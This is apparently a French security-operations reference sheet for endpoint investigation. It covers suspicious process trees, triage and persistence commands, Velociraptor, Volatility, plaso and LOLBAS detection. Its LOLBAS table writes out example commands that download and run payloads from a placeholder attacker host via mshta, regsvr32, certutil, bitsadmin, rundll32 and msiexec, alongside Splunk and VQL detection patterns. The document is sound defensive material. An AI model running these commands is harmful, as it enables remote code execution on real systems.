---
title: "Investigation endpoint — EDR & Artefacts"
domain: security
subdomain: soc
phase: 02-investigation
type: snippet
tags: [soc, endpoint, EDR, process, persistence, memory, DFIR]
difficulty: advanced
status: stable
updated: "2025-05-13"
---
## Arbres de processus suspects
| Pattern | Signification | ATT&CK |
|---|---|---|
| `WINWORD.EXE → powershell.exe` | Macro Office malveillante | T1566.001, T1059.001 |
| `EXCEL.EXE → cmd.exe → net.exe` | Macro téléchargeant payload | T1059.003 |
| `outlook.exe → wscript.exe` | Pièce jointe script malveillant | T1566.001 |
| `explorer.exe → cmd.exe → net.exe` | Exécution manuelle par attaquant | T1059.003 |
| `lsass.exe → [tout enfant]` | Injection dans lsass (très rare légitime) | T1055 |
| `svchost.exe → powershell.exe` | Service malveillant ou WMI exec | T1047, T1059.001 |
| `msiexec.exe → rundll32.exe → regsvr32.exe` | Chaîne LOLBAS | T1218 |
| `wscript.exe → powershell.exe -enc` | Script VBS dropper | T1059.005 |
| `regsvr32.exe /s /u /i:http://...` | Squiblydoo bypass | T1218.010 |
---
## Commandes d'investigation processus
### Windows
```powershell
# Liste des processus avec path et hash
Get-Process | Select-Object Name, Id, Path, @{
N='Hash'; E={(Get-FileHash $_.Path -EA 0).Hash}
} | Where-Object Path -ne $null | Format-Table -Auto
# Processus avec connexions réseau actives
Get-NetTCPConnection -State Established | ForEach-Object {
$proc = Get-Process -Id $_.OwningProcess -EA 0
[PSCustomObject]@{
LocalAddr = $_.LocalAddress
LocalPort = $_.LocalPort
RemoteAddr = $_.RemoteAddress
RemotePort = $_.RemotePort
PID = $_.OwningProcess
Process = $proc.Name
Path = $proc.Path
}
} | Format-Table -Auto
# Arbre de processus complet
Get-WmiObject Win32_Process | Select-Object ProcessId, ParentProcessId, Name, CommandLine |
Sort-Object ParentProcessId | Format-Table -Auto
# Processus injectés — modules inhabituels
tasklist /m /fi "STATUS eq running" | findstr /i "{{SUSPICIOUS_DLL}}"
```
```cmd
REM Investigation rapide ligne de commande
tasklist /v /fo csv > c:\temp\tasklist.csv
wmic process get ProcessId,ParentProcessId,Name,CommandLine /format:csv > c:\temp\processes.csv
netstat -nao > c:\temp\netstat.csv
```
### Linux
```bash
# Processus suspects — parents/enfants
ps auxf --sort=-%cpu | head -40
# Processus avec connexions réseau
ss -tulnp | awk '{print $NF}' | grep -oP 'pid=\K[0-9]+' | \
xargs -I{} sh -c 'echo "PID: {}"; ls -la /proc/{}/exe 2>/dev/null'
# Processus sans binaire sur disque (fileless)
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
exe=$(readlink /proc/$pid/exe 2>/dev/null)
if echo "$exe" | grep -q "(deleted)"; then
echo "DELETED: PID=$pid EXE=$exe CMD=$(cat /proc/$pid/cmdline 2>/dev/null | tr '\0' ' ')"
fi
done
# Fichiers ouverts par un processus suspect
lsof -p {{PID}} 2>/dev/null | grep -v "REG\|DIR" | head -30
```
---
## Checklist — Persistance
```powershell
# Audit persistance — Run keys
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
# WMI subscriptions — persistance avancée (T1546.003)
Get-WMIObject -Namespace root/subscription -Class __EventFilter
Get-WMIObject -Namespace root/subscription -Class __EventConsumer
Get-WMIObject -Namespace root/subscription -Class __FilterToConsumerBinding
# Scheduled Tasks — contenu complet
Get-ScheduledTask | Where-Object State -ne "Disabled" |
ForEach-Object { $_.Actions } | Select-Object Execute, Arguments |
Where-Object { $_.Execute -match "powershell|cmd|wscript|mshta|regsvr" }
```
---
## Velociraptor / EDR — Collecte d'artefacts
```yaml
# Velociraptor — Query VQL pour investigation endpoint
SELECT *
FROM Artifact.Windows.System.Pslist()
WHERE CommandLine =~ "(?i)(base64|enc|http|Download)"
# Collecte de tous les artefacts de persistance
SELECT * FROM Artifact.Windows.Persistence.PermanentWMIEvents()
SELECT * FROM Artifact.Windows.System.ScheduledTasks()
SELECT * FROM Artifact.Windows.Registry.RunKeys()
```
```bash
# EDR CLI — Isoler un hôte (exemple CrowdStrike Falcon)
# Via API Falcon
curl -X POST "https://api.crowdstrike.com/devices/entities/devices-actions/v2?action_name=contain" \
-H "Authorization: Bearer {{FALCON_TOKEN}}" \
-H "Content-Type: application/json" \
-d '{"ids": ["{{DEVICE_ID}}"]}'
```
---
## Forensique mémoire — Volatility 3
```bash
# Volatility3 — Installation et usage de base
pip install volatility3
# Image mémoire — liste des processus
vol.py -f memory.dmp windows.pslist
# Arbre de processus
vol.py -f memory.dmp windows.pstree
# Connexions réseau en mémoire
vol.py -f memory.dmp windows.netscan
# Détection de code injecté (MZ headers dans régions non-image)
vol.py -f memory.dmp windows.malfind --pid {{PID}}
# DLLs chargées par un processus
vol.py -f memory.dmp windows.dlllist --pid {{PID}}
# Dumps des processus suspects
vol.py -f memory.dmp windows.memmap --pid {{PID}} --dump
# Analyse des handles ouverts
vol.py -f memory.dmp windows.handles --pid {{PID}}
# Recherche de strings dans la mémoire d'un processus
vol.py -f memory.dmp windows.strings --pid {{PID}} | grep -iE "(http|cmd|powershell|VirtualAlloc)"
```
---
## Timeline — plaso / log2timeline
```bash
# Créer une timeline complète d'un système Windows (image disque)
log2timeline.py --parsers win7,winreg \
/output/timeline.plaso \
/mnt/evidence/image.dd
# Filtrer et exporter au format CSV
psort.py -o l2tcsv \
-w /output/timeline.csv \
/output/timeline.plaso \
"date > '{{START_DATE}}' and date < '{{END_DATE}}'"
# Recherche rapide d'événements suspects
grep -i "powershell\|psexec\|mimikatz\|lsass" /output/timeline.csv | head -50
```
---
## LOLBAS — Détection des abus
| Binaire | Technique d'abus | Commande suspecte | ATT&CK |
|---|---|---|---|
| `mshta.exe` | Exécution HTA/VBS | `mshta http://{{LHOST}}/evil.hta` | T1218.005 |
| `regsvr32.exe` | Squiblydoo — DLL distante | `regsvr32 /s /u /i:http://{{LHOST}}/evil.sct scrobj.dll` | T1218.010 |
| `certutil.exe` | Download de payload | `certutil -urlcache -split -f http://{{LHOST}}/payload.exe` | T1105 |
| `bitsadmin.exe` | Download persistant | `bitsadmin /transfer job http://{{LHOST}}/evil.exe c:\tmp\evil.exe` | T1197 |
| `wscript.exe` | Exécution de scripts | `wscript //e:VBScript //b evil.js` | T1059.005 |
| `rundll32.exe` | Exécution DLL | `rundll32 \\{{LHOST}}\share\evil.dll,DllMain` | T1218.011 |
| `msiexec.exe` | Install MSI distant | `msiexec /q /i http://{{LHOST}}/evil.msi` | T1218.007 |
| `odbcconf.exe` | Proxy d'exécution | `odbcconf /s /a {REGSVR evil.dll}` | T1218.008 |
```splunk
# Splunk — Détection LOLBAS avec arguments réseau
index=windows EventCode=4688 earliest=-24h
(NewProcessName="*certutil*" AND CommandLine="*http*")
OR (NewProcessName="*mshta*" AND (CommandLine="*http*" OR CommandLine="*\\\\*"))
OR (NewProcessName="*regsvr32*" AND CommandLine="*scrobj*")
OR (NewProcessName="*bitsadmin*" AND CommandLine="*transfer*")
OR (NewProcessName="*rundll32*" AND CommandLine="*\\\\*")
| table _time, host, SubjectUserName, NewProcessName, CommandLine
| sort _time
```
Vérifier le niveau d'intégrité du processus parent — un enfant de niveau "Medium Integrity" généré par un processus "High Integrity" est normal lors d'une élévation, mais l'inverse (un enfant High issu d'un parent Medium sans UAC visible) est un marqueur d'escalade de privilèges non-standard à investiguer immédiatement.